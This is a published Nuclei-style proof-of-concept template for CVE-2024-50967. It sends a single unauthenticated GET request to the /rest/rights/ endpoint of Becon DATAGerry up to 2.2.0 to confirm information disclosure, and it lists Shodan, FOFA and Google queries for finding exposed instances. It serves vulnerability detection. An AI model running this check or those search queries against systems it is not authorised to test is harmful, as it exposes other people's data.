The /rest/rights/ REST API endpoint in Becon DATAGerry through 2.2.0 contains an Incorrect Access Control vulnerability. An attacker can remotely access this endpoint without authentication, leading to unauthorized disclosure of sensitive information.
PoC代码[已公开]
id: CVE-2024-50967
info:
name: DATAGERRY - Improper Access Control
author: s4e-io,0xByteHunter
severity: high
description: |
The /rest/rights/ REST API endpoint in Becon DATAGerry through 2.2.0 contains an Incorrect Access Control vulnerability. An attacker can remotely access this endpoint without authentication, leading to unauthorized disclosure of sensitive information.
reference:
- https://medium.com/@0xbytehunter/my-first-cve-discovery-of-broken-access-control-in-the-datagerry-platform-7b0404f88a43
- https://github.com/0xByteHunter/CVE-2024-50967
- https://nvd.nist.gov/vuln/detail/CVE-2024-50967
classification:
cve-id: CVE-2024-50967
cwe-id: CWE-200
epss-score: 0.37152
epss-percentile: 0.9706
metadata:
verified: true
max-request: 1
vendor: becon
product: datagerry
shodan-query: http.title:"datagerry"
fofa-query: title="datagerry"
google-query: intitle:"datagerry"
tags: cve,cve2024,datagerry,auth-bypass,vkev
http:
- method: GET
path:
- "{{BaseURL}}/rest/rights/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response_type":'
- '"model":'
- '"time":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100e729aebe1d879e05d70fc2882e7a10b8d01da615d99e1c599cd464c69ffcbc5002205c00330f4b53fc79583ff30862fb0f3c8b7ba01633b017047ee89274666055f2:922c64590222798bb761d5b6d8e72950